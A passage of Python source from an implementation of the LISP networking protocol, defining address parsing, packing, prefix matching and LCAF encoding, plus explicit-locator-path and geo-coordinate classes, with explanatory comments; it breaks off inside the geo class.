        if (self.afi == LISP_AFI_E164): return (8)
        if (self.afi == LISP_AFI_LCAF): return (0)
        if (self.afi == LISP_AFI_NAME): return (len(self.address) + 1)
        if (self.afi == LISP_AFI_IID_RANGE): return (4)
        if (self.afi == LISP_AFI_GEO_COORD):
            return (len(self.address.print_geo()))

        return (0)

    def afi_to_version(self):
        if (self.afi == LISP_AFI_IPV4): return (4)
        if (self.afi == LISP_AFI_IPV6): return (6)
        return (0)
    def packet_format(self):
        if (self.afi == LISP_AFI_IPV4): return ("I")
        if (self.afi == LISP_AFI_IPV6): return ("QQ")
        if (self.afi == LISP_AFI_MAC): return ("HHH")
        if (self.afi == LISP_AFI_E164): return ("II")
        if (self.afi == LISP_AFI_LCAF): return ("I")
        return ("")
    def pack_address(self):
        O0O00Oo = self.packet_format()
        IiiiIi1iiii11 = ""
        if (self.is_ipv4()):
            IiiiIi1iiii11 = struct.pack(O0O00Oo, socket.htonl(self.address))
        elif (self.is_ipv6()):
            ooOo0O0 = byte_swap_64(self.address >> 64)
            ooo0 = byte_swap_64(self.address & 0xffffffffffffffff)
            IiiiIi1iiii11 = struct.pack(O0O00Oo, ooOo0O0, ooo0)
        elif (self.is_mac()):
            o0o00O0oOooO0 = self.address
            ooOo0O0 = (o0o00O0oOooO0 >> 32) & 0xffff
            ooo0 = (o0o00O0oOooO0 >> 16) & 0xffff
            OOOo00oO = o0o00O0oOooO0 & 0xffff
            IiiiIi1iiii11 = struct.pack(O0O00Oo, ooOo0O0, ooo0, OOOo00oO)
        elif (self.is_e164()):
            o0o00O0oOooO0 = self.address
            ooOo0O0 = (o0o00O0oOooO0 >> 32) & 0xffffffff
            ooo0 = (o0o00O0oOooO0 & 0xffffffff)
            IiiiIi1iiii11 = struct.pack(O0O00Oo, ooOo0O0, ooo0)
        elif (self.is_dist_name()):
            IiiiIi1iiii11 += self.address + "\0"

        return (IiiiIi1iiii11)
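    # Wire-format example (added; illustrative usage, relying on the
    # struct/socket imports this module already has): an IPv4 address packs
    # to one network-byte-order 32-bit word:
    #
    #   a = lisp_address(LISP_AFI_IPV4, "192.0.2.1", 32, 0)
    #   a.pack_address()   # -> '\xc0\x00\x02\x01' (4 bytes)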
    def unpack_address(self, packet):
        O0O00Oo = self.packet_format()
        IiIii1i = struct.calcsize(O0O00Oo)
        if (len(packet) < IiIii1i): return (None)

        o0o00O0oOooO0 = struct.unpack(O0O00Oo, packet[:IiIii1i])

        if (self.is_ipv4()):
            self.address = socket.ntohl(o0o00O0oOooO0[0])

        elif (self.is_ipv6()):
            if (o0o00O0oOooO0[0] <= 0xffff and
                (o0o00O0oOooO0[0] & 0xff) == 0):
                IiIIi1i = (o0o00O0oOooO0[0] << 48) << 64
            else:
                IiIIi1i = byte_swap_64(o0o00O0oOooO0[0]) << 64

            OO00 = byte_swap_64(o0o00O0oOooO0[1])
            self.address = IiIIi1i | OO00

        elif (self.is_mac()):
            oOiII1i1 = o0o00O0oOooO0[0]
            ii1III = o0o00O0oOooO0[1]
            Ii11 = o0o00O0oOooO0[2]
            self.address = (oOiII1i1 << 32) + (ii1III << 16) + Ii11

        elif (self.is_e164()):
            self.address = (o0o00O0oOooO0[0] << 32) + o0o00O0oOooO0[1]

        elif (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            IiIii1i = 0

        packet = packet[IiIii1i::]
        return (packet)
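    # Byte-order note (descriptive comment, an inference from the code
    # above): the IPv6 branch special-cases a first 64-bit word that looks
    # like an already-swapped "::"-leading value (<= 0xffff with a zero low
    # byte); everything else goes through byte_swap_64() on both halves to
    # rebuild the 128-bit integer from the two host-order "Q" words.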
    def is_ipv4(self):
        return (True if (self.afi == LISP_AFI_IPV4) else False)

    def is_ipv4_link_local(self):
        if (self.is_ipv4() == False): return (False)
        return (((self.address >> 16) & 0xffff) == 0xa9fe)

    def is_ipv4_loopback(self):
        if (self.is_ipv4() == False): return (False)
        return (self.address == 0x7f000001)

    def is_ipv4_multicast(self):
        if (self.is_ipv4() == False): return (False)
        return (((self.address >> 24) & 0xf0) == 0xe0)

    def is_ipv4_string(self, addr_str):
        return (addr_str.find(".") != -1)

    def is_ipv6(self):
        return (True if (self.afi == LISP_AFI_IPV6) else False)

    def is_ipv6_link_local(self):
        if (self.is_ipv6() == False): return (False)
        return (((self.address >> 112) & 0xffff) == 0xfe80)

    def is_ipv6_string_link_local(self, addr_str):
        return (addr_str.find("fe80::") != -1)

    def is_ipv6_loopback(self):
        if (self.is_ipv6() == False): return (False)
        return (self.address == 1)

    def is_ipv6_multicast(self):
        if (self.is_ipv6() == False): return (False)
        return (((self.address >> 120) & 0xff) == 0xff)

    def is_ipv6_string(self, addr_str):
        return (addr_str.find(":") != -1)

    def is_mac(self):
        return (True if (self.afi == LISP_AFI_MAC) else False)

    def is_mac_multicast(self):
        if (self.is_mac() == False): return (False)
        return ((self.address & 0x010000000000) != 0)

    def is_mac_broadcast(self):
        if (self.is_mac() == False): return (False)
        return (self.address == 0xffffffffffff)

    def is_mac_string(self, addr_str):
        return (len(addr_str) == 15 and addr_str.find("-") != -1)

    def is_link_local_multicast(self):
        if (self.is_ipv4()):
            return ((0xe0ffff00 & self.address) == 0xe0000000)

        if (self.is_ipv6()):
            return ((self.address >> 112) & 0xffff == 0xff02)

        return (False)

    def is_null(self):
        return (True if (self.afi == LISP_AFI_NONE) else False)

    def is_ultimate_root(self):
        return (True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)

    def is_iid_range(self):
        return (True if self.afi == LISP_AFI_IID_RANGE else False)

    def is_e164(self):
        return (True if (self.afi == LISP_AFI_E164) else False)

    def is_dist_name(self):
        return (True if (self.afi == LISP_AFI_NAME) else False)

    def is_geo_prefix(self):
        return (True if (self.afi == LISP_AFI_GEO_COORD) else False)

    def is_binary(self):
        if (self.is_dist_name()): return (False)
        if (self.is_geo_prefix()): return (False)
        return (True)
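    # Quick reference for the predicates above (descriptive comment):
    #   is_ipv4_link_local  -> true for 169.254.0.0/16 (top 16 bits 0xa9fe)
    #   is_ipv4_multicast   -> true for 224.0.0.0/4    (top 4 bits 0xe)
    #   is_ipv6_link_local  -> true for fe80::/16
    #   is_ipv6_multicast   -> true for ff00::/8
    #   is_mac_multicast    -> true when the I/G bit (0x01 in the first
    #                          octet) is set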
    def store_address(self, addr_str):
        if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)

        #
        # Parse and strip a leading "[<iid>]" instance-id, if present.
        #
        left = addr_str.find("[")
        right = addr_str.find("]")
        if (left != -1 and right != -1):
            self.instance_id = int(addr_str[left+1:right])
            addr_str = addr_str[right+1::]
            if (self.is_dist_name() == False):
                addr_str = addr_str.replace(" ", "")

        #
        # Convert the printable form into the internal integer (or object)
        # representation, per address-family.
        #
        if (self.is_ipv4()):
            octets = addr_str.split(".")
            value = int(octets[0]) << 24
            value += int(octets[1]) << 16
            value += int(octets[2]) << 8
            value += int(octets[3])
            self.address = value
        elif (self.is_ipv6()):

            #
            # inet_pton() mishandles a zero in the first 16-bits of the
            # address, so detect "::" at offset 2 and swap the first two
            # bytes back after conversion.
            #
            odd = (addr_str[2:4] == "::")
            try:
                addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
            except:
                addr_str = socket.inet_pton(socket.AF_INET6, "0::0")

            addr_str = binascii.hexlify(addr_str)
            if (odd):
                addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
            self.address = int(addr_str, 16)
        elif (self.is_geo_prefix()):
            geo = lisp_geo(None)
            geo.name = "geo-prefix-{}".format(geo)
            geo.parse_geo_string(addr_str)
            self.address = geo
        elif (self.is_mac()):
            addr_str = addr_str.replace("-", "")
            self.address = int(addr_str, 16)
        elif (self.is_e164()):
            addr_str = addr_str[1::]
            self.address = int(addr_str, 16) << 4
        elif (self.is_dist_name()):
            self.address = addr_str.replace("'", "")

        self.mask_len = self.host_mask_len()

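#
# Illustrative example (not called anywhere): how store_address() packs a
# dotted-quad IPv4 string into the integer form used above. Values are
# chosen only for demonstration:
#
#   >>> octets = "10.1.2.3".split(".")
#   >>> hex((int(octets[0]) << 24) + (int(octets[1]) << 16) +
#   ...     (int(octets[2]) << 8) + int(octets[3]))
#   '0xa010203'
#
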
    def store_prefix(self, prefix_str):
        if (self.is_geo_string(prefix_str)):
            index = prefix_str.find("]")
            mask_len = len(prefix_str[index+1::]) * 8
        elif (prefix_str.find("/") != -1):
            prefix_str, mask_len = prefix_str.split("/")
        else:
            left = prefix_str.find("'")
            if (left == -1): return
            right = prefix_str.find("'", left+1)
            if (right == -1): return
            mask_len = len(prefix_str[left+1:right]) * 8

        self.string_to_afi(prefix_str)
        self.store_address(prefix_str)
        self.mask_len = int(mask_len)

    def zero_host_bits(self):
        if (self.mask_len < 0): return
        mask = (2 ** self.mask_len) - 1
        shift = self.addr_length() * 8 - self.mask_len
        mask <<= shift
        self.address &= mask

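#
# Worked example (illustrative): for a 24-bit mask on a 4-byte IPv4
# address, zero_host_bits() computes mask = (2**24 - 1) << (32 - 24)
# = 0xffffff00, so 10.1.2.3 & mask leaves 10.1.2.0.
#
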
    def is_geo_string(self, addr_str):
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]

        geo_str = addr_str.split("/")
        if (len(geo_str) == 2):
            if (geo_str[1].isdigit() == False): return(False)

        geo_str = geo_str[0]
        geo_str = geo_str.split("-")
        token_count = len(geo_str)
        if (token_count < 8 or token_count > 9): return(False)

        #
        # Tokens 0-2 and 4-6 are digits, token 3 is N/S, token 7 is W/E,
        # the optional 9th token is an altitude.
        #
        for i in range(0, token_count):
            if (i == 3):
                if (geo_str[i] in ["N", "S"]): continue
                return(False)
            if (i == 7):
                if (geo_str[i] in ["W", "E"]): continue
                return(False)
            if (geo_str[i].isdigit() == False): return(False)
        return(True)

    def string_to_afi(self, addr_str):
        if (addr_str.count("'") == 2):
            self.afi = LISP_AFI_NAME
            return
        if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
        elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
        elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
        elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
        elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
        else: self.afi = LISP_AFI_NONE

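#
# Classification above is purely syntactic, checked in this order
# (illustrative inputs):
#
#   "'www'"          -> LISP_AFI_NAME       (two single quotes)
#   "fe80::1"        -> LISP_AFI_IPV6       (contains ':')
#   "10.0.0.1"       -> LISP_AFI_IPV4       (contains '.')
#   "+14085551212"   -> LISP_AFI_E164       (contains '+')
#   geo string       -> LISP_AFI_GEO_COORD  (is_geo_string() matches)
#   "0000-0000-0001" -> LISP_AFI_MAC        (contains '-')
#
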
    def print_address(self):
        addr_str = self.print_address_no_iid()
        iid_str = "[" + str(self.instance_id)
        for iid in self.iid_list: iid_str += "," + str(iid)
        iid_str += "]"
        return("{}{}".format(iid_str, addr_str))

    def print_address_no_iid(self):
        if (self.is_ipv4()):
            value = self.address
            byte1 = value >> 24
            byte2 = (value >> 16) & 0xff
            byte3 = (value >> 8) & 0xff
            byte4 = value & 0xff
            return("{}.{}.{}.{}".format(byte1, byte2, byte3, byte4))
        elif (self.is_ipv6()):
            addr_str = lisp_hex_string(self.address).zfill(32)
            addr_str = binascii.unhexlify(addr_str)
            addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
            return("{}".format(addr_str))
        elif (self.is_geo_prefix()):
            return("{}".format(self.address.print_geo()))
        elif (self.is_mac()):
            addr_str = lisp_hex_string(self.address).zfill(12)
            addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
                addr_str[8:12])
            return("{}".format(addr_str))
        elif (self.is_e164()):
            addr_str = lisp_hex_string(self.address).zfill(15)
            return("+{}".format(addr_str))
        elif (self.is_dist_name()):
            return("'{}'".format(self.address))
        elif (self.is_null()):
            return("no-address")
        return("unknown-afi:{}".format(self.afi))

    def print_prefix(self):
        if (self.is_ultimate_root()): return("[*]")
        if (self.is_iid_range()):
            if (self.mask_len == 32): return("[{}]".format(self.instance_id))
            upper = self.instance_id + (2 ** (32 - self.mask_len) - 1)
            return("[{}-{}]".format(self.instance_id, upper))

        addr_str = self.print_address()
        if (self.is_dist_name()): return(addr_str)
        if (self.is_geo_prefix()): return(addr_str)

        index = addr_str.find("no-address")
        if (index == -1):
            addr_str = "{}/{}".format(addr_str, str(self.mask_len))
        else:
            addr_str = addr_str[0:index]
        return(addr_str)

    def print_prefix_no_iid(self):
        addr_str = self.print_address_no_iid()
        if (self.is_dist_name()): return(addr_str)
        if (self.is_geo_prefix()): return(addr_str)
        return("{}/{}".format(addr_str, str(self.mask_len)))

    def print_prefix_url(self):
        if (self.is_ultimate_root()): return("0--0")
        addr_str = self.print_address()
        index = addr_str.find("]")
        if (index != -1): addr_str = addr_str[index+1::]
        if (self.is_geo_prefix()):
            addr_str = addr_str.replace("/", "-")
            return("{}-{}".format(self.instance_id, addr_str))
        return("{}-{}-{}".format(self.instance_id, addr_str, self.mask_len))

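#
# Shapes produced above (illustrative): the ultimate root prints as
# "0--0", a geo-prefix as "<iid>-<geo-string-with-dashes>", and anything
# else as "<iid>-<address>-<mask-len>", e.g. "0-10.0.0.0-8".
#
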
    def print_sg(self, g):
        s = self.print_prefix()
        s_index = s.find("]") + 1
        g = g.print_prefix()
        g_index = g.find("]") + 1
        sg_str = "[{}]({}, {})".format(self.instance_id, s[s_index::],
            g[g_index::])
        return(sg_str)

    def hash_address(self, addr):
        local_value = self.address
        addr_value = addr.address

        if (self.is_geo_prefix()): local_value = self.address.print_geo()
        if (addr.is_geo_prefix()): addr_value = addr.address.print_geo()

        #
        # String addresses (names, geo strings) hash on their first byte.
        #
        if (type(local_value) == str):
            local_value = int(binascii.hexlify(local_value[0:1]))
        if (type(addr_value) == str):
            addr_value = int(binascii.hexlify(addr_value[0:1]))
        return(local_value ^ addr_value)

    #
    # Return True when self is more specific than (or equal to) the
    # supplied prefix. Handles instance-id ranges, distinguished-names,
    # and geo-prefixes as well as binary address-families.
    #
    def is_more_specific(self, prefix):
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)

        mask_len = prefix.mask_len
        if (prefix.afi == LISP_AFI_IID_RANGE):
            size = 2 ** (32 - mask_len)
            start = prefix.instance_id
            end = start + size
            return(self.instance_id in range(start, end))

        if (self.instance_id != prefix.instance_id): return(False)
        if (self.afi != prefix.afi):
            if (prefix.afi != LISP_AFI_NONE): return(False)

        #
        # Non-binary address-families compare as strings, the longer
        # string must start with the shorter prefix string.
        #
        if (self.is_binary() == False):
            if (prefix.afi == LISP_AFI_NONE): return(True)
            if (type(self.address) != type(prefix.address)): return(False)
            addr_str = self.address
            prefix_str = prefix.address
            if (self.is_geo_prefix()):
                addr_str = self.address.print_geo()
                prefix_str = prefix.address.print_geo()
            if (len(addr_str) < len(prefix_str)): return(False)
            return(addr_str.find(prefix_str) == 0)

        #
        # Binary longest-match: compare under the shorter prefix's mask.
        #
        if (self.mask_len < mask_len): return(False)

        shift = (prefix.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        return((self.address & mask) == prefix.address)

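#
# Worked example (illustrative): with prefix 10.0.0.0/8 in the same
# instance-id, a lookup of 10.1.2.0/24 is more specific because
# 24 >= 8 and 0x0a010200 & 0xff000000 == 0x0a000000, i.e. the address
# matches under the shorter prefix's mask.
#
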
    def mask_address(self, mask_len):
        shift = (self.addr_length() * 8) - mask_len
        mask = (2 ** mask_len - 1) << shift
        self.address &= mask

    def is_exact_match(self, prefix):
        if (self.instance_id != prefix.instance_id): return(False)
        p1 = self.print_prefix()
        p2 = prefix.print_prefix() if prefix else ""
        return(p1 == p2)

    def is_local(self):
        if (self.is_ipv4()):
            myrloc = lisp_myrlocs[0]
            if (myrloc == None): return(False)
            myrloc = myrloc.print_address_no_iid()
            return(self.print_address_no_iid() == myrloc)

        if (self.is_ipv6()):
            myrloc = lisp_myrlocs[1]
            if (myrloc == None): return(False)
            myrloc = myrloc.print_address_no_iid()
            return(self.print_address_no_iid() == myrloc)

        return(False)

    def store_iid_range(self, iid, mask_len):
        if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
            else: self.afi = LISP_AFI_IID_RANGE

        self.instance_id = iid
        self.mask_len = mask_len

    #
    # Compute the encoded length of this address inside an LCAF of the
    # given type: address bytes plus a 2-byte AFI, plus the type-specific
    # fixed fields.
    #
    def lcaf_length(self, lcaf_type):
        length = self.addr_length() + 2
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
        if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
        if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
        if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
        if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
        return(length)

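#
# Example (illustrative): for an IPv4 EID inside an Instance-ID LCAF,
# addr_length() is 4, so lcaf_length() returns 4 + 2 (AFI field) + 4
# (instance-id word) = 10 bytes following the LCAF length field.
#
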
    def lcaf_encode_iid(self):
        lcaf_type = LISP_LCAF_INSTANCE_ID_TYPE
        lcaf_len = socket.htons(self.lcaf_length(lcaf_type))
        iid = self.instance_id
        afi = self.afi
        mask_len = 0

        #
        # Negative AFIs are internal pseudo address-families. A geo-coord
        # is encoded as a nested LCAF; anything else encodes as AFI 0
        # (instance-id only) with the IID mask-length in the header.
        #
        if (afi < 0):
            if (self.afi == LISP_AFI_GEO_COORD):
                afi = LISP_AFI_LCAF
                mask_len = 0
            else:
                afi = 0
                mask_len = self.mask_len

        packet = struct.pack("BBBBH", 0, 0, lcaf_type, mask_len, lcaf_len)
        packet += struct.pack("IH", socket.htonl(iid), socket.htons(afi))
        if (afi == 0): return(packet)

        if (self.afi == LISP_AFI_GEO_COORD):
            packet = packet[0:-2]
            packet += self.address.encode_geo()
            return(packet)

        packet += self.pack_address()
        return(packet)

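#
# The header packed above is: 1 byte reserved, 1 byte flags, 1 byte LCAF
# type (Instance ID, per RFC 8060), 1 byte IID mask-length, 2 bytes
# payload length, then a 4-byte instance-id and a 2-byte AFI (0 when only
# an instance-id or IID range is encoded; LISP_AFI_LCAF when a nested
# geo-coord LCAF follows).
#
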
    def lcaf_decode_iid(self, packet):
        packet_format = "BBBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        rsvd1, flags, lcaf_type, iid_mask_len, lcaf_len = \
            struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_INSTANCE_ID_TYPE): return(None)

        packet_format = "IH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        iid, afi = struct.unpack(packet_format, packet[:format_size])
        packet = packet[format_size::]

        lcaf_len = socket.ntohs(lcaf_len)
        self.instance_id = socket.ntohl(iid)
        afi = socket.ntohs(afi)
        self.afi = afi
        if (iid_mask_len != 0 and afi == 0): self.mask_len = iid_mask_len
        if (afi == 0):
            self.afi = LISP_AFI_IID_RANGE if iid_mask_len else \
                LISP_AFI_ULTIMATE_ROOT

        #
        # AFI 0 means no address follows the instance-id.
        #
        if (afi == 0): return(packet)

        #
        # Distinguished-names are variable-length strings.
        #
        if (self.is_dist_name()):
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            return(packet)

        #
        # A nested LCAF here can only be a geo-coord.
        #
        if (afi == LISP_AFI_LCAF):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, flags, lcaf_type, radius_hi, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, radius_hi)
            self.mask_len = self.host_mask_len()
            return(packet)

        addr_length = self.addr_length()
        if (len(packet) < addr_length): return(None)

        packet = self.unpack_address(packet)
        return(packet)

    def lcaf_encode_sg(self, group):
        lcaf_type = LISP_LCAF_MCAST_INFO_TYPE
        iid = socket.htonl(self.instance_id)
        lcaf_len = socket.htons(self.lcaf_length(lcaf_type))
        packet = struct.pack("BBBBHIHBB", 0, 0, lcaf_type, 0, lcaf_len, iid,
            0, self.mask_len, group.mask_len)

        packet += struct.pack("H", socket.htons(self.afi))
        packet += self.pack_address()
        packet += struct.pack("H", socket.htons(group.afi))
        packet += group.pack_address()
        return(packet)

    def lcaf_decode_sg(self, packet):
        packet_format = "BBBBHIHBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        rsvd1, flags, lcaf_type, rsvd2, lcaf_len, iid, rsvd3, smask_len, \
            gmask_len = struct.unpack(packet_format, packet[:format_size])

        packet = packet[format_size::]

        if (lcaf_type != LISP_LCAF_MCAST_INFO_TYPE): return([None, None])

        self.instance_id = socket.ntohl(iid)
        lcaf_len = socket.ntohs(lcaf_len) - 8

        #
        # Get AFI-encoded source address, stored in self.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (lcaf_len < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        lcaf_len -= format_size
        self.afi = socket.ntohs(afi)
        self.mask_len = smask_len
        addr_length = self.addr_length()
        if (lcaf_len < addr_length): return([None, None])

        packet = self.unpack_address(packet)
        if (packet == None): return([None, None])

        lcaf_len -= addr_length

        #
        # Get AFI-encoded group address, returned in a new lisp_address.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])
        if (lcaf_len < format_size): return([None, None])

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        lcaf_len -= format_size
        group = lisp_address(LISP_AFI_NONE, "", 0, 0)
        group.afi = socket.ntohs(afi)
        group.mask_len = gmask_len
        group.instance_id = self.instance_id
        addr_length = self.addr_length()
        if (lcaf_len < addr_length): return([None, None])

        packet = group.unpack_address(packet)
        if (packet == None): return([None, None])

        return([packet, group])

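#
# Usage sketch (hypothetical caller): decoding fills self with the source
# and returns the remaining packet plus a separate group lisp_address;
# both are None on a malformed record:
#
#   >>> source = lisp_address(LISP_AFI_NONE, "", 0, 0)
#   >>> packet, group = source.lcaf_decode_sg(packet)
#
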
    def lcaf_decode_eid(self, packet):
        packet_format = "BBB"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return([None, None])

        #
        # Peek at the LCAF type, then dispatch on instance-id,
        # multicast-info, or geo-coord formats.
        #
        rsvd, flags, lcaf_type = struct.unpack(packet_format,
            packet[:format_size])

        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE):
            return([self.lcaf_decode_iid(packet), None])
        elif (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE):
            packet, group = self.lcaf_decode_sg(packet)
            return([packet, group])
        elif (lcaf_type == LISP_LCAF_GEO_COORD_TYPE):
            packet_format = "BBBBH"
            format_size = struct.calcsize(packet_format)
            if (len(packet) < format_size): return(None)

            rsvd1, flags, lcaf_type, radius_hi, lcaf_len = \
                struct.unpack(packet_format, packet[:format_size])

            if (lcaf_type != LISP_LCAF_GEO_COORD_TYPE): return(None)

            lcaf_len = socket.ntohs(lcaf_len)
            packet = packet[format_size::]
            if (lcaf_len > len(packet)): return(None)

            geo = lisp_geo("")
            self.instance_id = 0
            self.afi = LISP_AFI_GEO_COORD
            self.address = geo
            packet = geo.decode_geo(packet, lcaf_len, radius_hi)
            self.mask_len = self.host_mask_len()

        return([packet, None])

class lisp_elp_node():
    def __init__(self):
        self.address = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.probe = False
        self.strict = False
        self.eid = False
        self.we_are_last = False

    def copy_elp_node(self):
        elp_node = lisp_elp_node()
        elp_node.address.copy_address(self.address)
        elp_node.probe = self.probe
        elp_node.strict = self.strict
        elp_node.eid = self.eid
        elp_node.we_are_last = self.we_are_last
        return(elp_node)

class lisp_elp():
    def __init__(self, name):
        self.elp_name = name
        self.elp_nodes = []
        self.use_elp_node = None
        self.we_are_last = False

    def copy_elp(self):
        elp = lisp_elp(self.elp_name)
        elp.use_elp_node = self.use_elp_node
        elp.we_are_last = self.we_are_last
        for elp_node in self.elp_nodes:
            elp.elp_nodes.append(elp_node.copy_elp_node())
        return(elp)

    def print_elp(self, want_marker):
        elp_str = ""
        for elp_node in self.elp_nodes:
            use_string = ""
            if (want_marker):
                if (elp_node == self.use_elp_node):
                    use_string = "*"
                elif (elp_node.we_are_last):
                    use_string = "x"

            elp_str += "{}{}({}{}{}), ".format(use_string,
                elp_node.address.print_address_no_iid(),
                "r" if elp_node.eid else "R", "P" if elp_node.probe else "p",
                "S" if elp_node.strict else "s")

        return(elp_str[0:-2] if elp_str != "" else "")

    def select_elp_node(self):
        ipv4, ipv6, device = lisp_myrlocs
        index = None

        for elp_node in self.elp_nodes:
            if (ipv4 and elp_node.address.is_exact_match(ipv4)):
                index = self.elp_nodes.index(elp_node)
                break
            if (ipv6 and elp_node.address.is_exact_match(ipv6)):
                index = self.elp_nodes.index(elp_node)
                break

        #
        # None of our RLOCs are in the path, so we are an ITR and should
        # encapsulate to the first ELP node.
        #
        if (index == None):
            self.use_elp_node = self.elp_nodes[0]
            elp_node.we_are_last = False
            return

        #
        # We matched the last ELP node, we are the final hop and there is
        # nothing to encapsulate to.
        #
        if (self.elp_nodes[-1] == self.elp_nodes[index]):
            self.use_elp_node = None
            elp_node.we_are_last = True
            return

        #
        # Otherwise, encapsulate to the next ELP node in the list.
        #
        self.use_elp_node = self.elp_nodes[index + 1]
        return

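#
# Selection walkthrough (illustrative): for an explicit path A -> B -> C
# where this node owns B, select_elp_node() finds index 1 and uses C as
# the next encapsulation hop; owning C makes this the final hop
# (use_elp_node = None); owning none of them means this node is an ITR
# and encapsulates to A, the head of the path.
#
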
class lisp_geo():
    def __init__(self, name):
        self.geo_name = name
        self.latitude = 0xffffffff
        self.lat_mins = 0
        self.lat_secs = 0
        self.longitude = 0xffffffff
        self.long_mins = 0
        self.long_secs = 0
        self.altitude = -1
        self.radius = 0

    def copy_geo(self):
        geo = lisp_geo(self.geo_name)
        geo.latitude = self.latitude
        geo.lat_mins = self.lat_mins
        geo.lat_secs = self.lat_secs
        geo.longitude = self.longitude
        geo.long_mins = self.long_mins
        geo.long_secs = self.long_secs
        geo.altitude = self.altitude
        geo.radius = self.radius
        return(geo)

    def no_geo_altitude(self):
        return(self.altitude == -1)

    def parse_geo_string(self, geo_str):
        index = geo_str.find("]")
        if (index != -1): geo_str = geo_str[index+1::]

        #
        # Strip an optional "/<radius-in-km>" suffix.
        #
        if (geo_str.find("/") != -1):
            geo_str, radius = geo_str.split("/")
            self.radius = int(radius)

        geo_str = geo_str.split("-")
        if (len(geo_str) < 8): return(False)

        latitude = geo_str[0:4]
        longitude = geo_str[4:8]

        #
        # Optional 9th token is an altitude in meters.
        #
        if (len(geo_str) > 8): self.altitude = int(geo_str[8])

        #
        # Latitude is degrees-minutes-seconds-N/S. Note the internal sign
        # convention: North is stored negative.
        #
        self.latitude = int(latitude[0])
        self.lat_mins = int(latitude[1])
        self.lat_secs = int(latitude[2])
        if (latitude[3] == "N"): self.latitude = -self.latitude

        #
        # Longitude is degrees-minutes-seconds-E/W, East stored negative.
        #
        self.longitude = int(longitude[0])
        self.long_mins = int(longitude[1])
        self.long_secs = int(longitude[2])
        if (longitude[3] == "E"): self.longitude = -self.longitude
        return(True)

    def print_geo(self):
        n_or_s = "N" if self.latitude < 0 else "S"
        e_or_w = "E" if self.longitude < 0 else "W"

        geo_str = "{}-{}-{}-{}-{}-{}-{}-{}".format(abs(self.latitude),
            self.lat_mins, self.lat_secs, n_or_s, abs(self.longitude),
            self.long_mins, self.long_secs, e_or_w)

        if (self.no_geo_altitude() == False):
            geo_str += "-" + str(self.altitude)

        #
        # Append "/<radius>" when this is a geo-prefix rather than a point.
        #
        if (self.radius != 0): geo_str += "/{}".format(self.radius)
        return(geo_str)

    def geo_url(self):
        #
        # Default to "" so an unset environment variable does not crash
        # the isdigit() check below.
        #
        zoom = os.getenv("LISP_GEO_ZOOM_LEVEL", "")
        zoom = "10" if (zoom == "" or zoom.isdigit() == False) else zoom
        lat, lon = self.dms_to_decimal()
        url = ("http://maps.googleapis.com/maps/api/staticmap?center={},{}" + \
            "&markers=color:blue%7Clabel:lisp%7C{},{}" + \
            "&zoom={}&size=1024x1024&sensor=false").format(lat, lon, lat,
            lon, zoom)
        return(url)

    def print_geo_url(self):
        geo_str = self.print_geo()
        if (self.radius == 0):
            url = self.geo_url()
            html = "<a href='{}'>{}</a>".format(url, geo_str)
        else:
            url = geo_str.replace("/", "-")
            html = "<a href='/lisp/geo-map/{}'>{}</a>".format(url, geo_str)
        return(html)

    def dms_to_decimal(self):
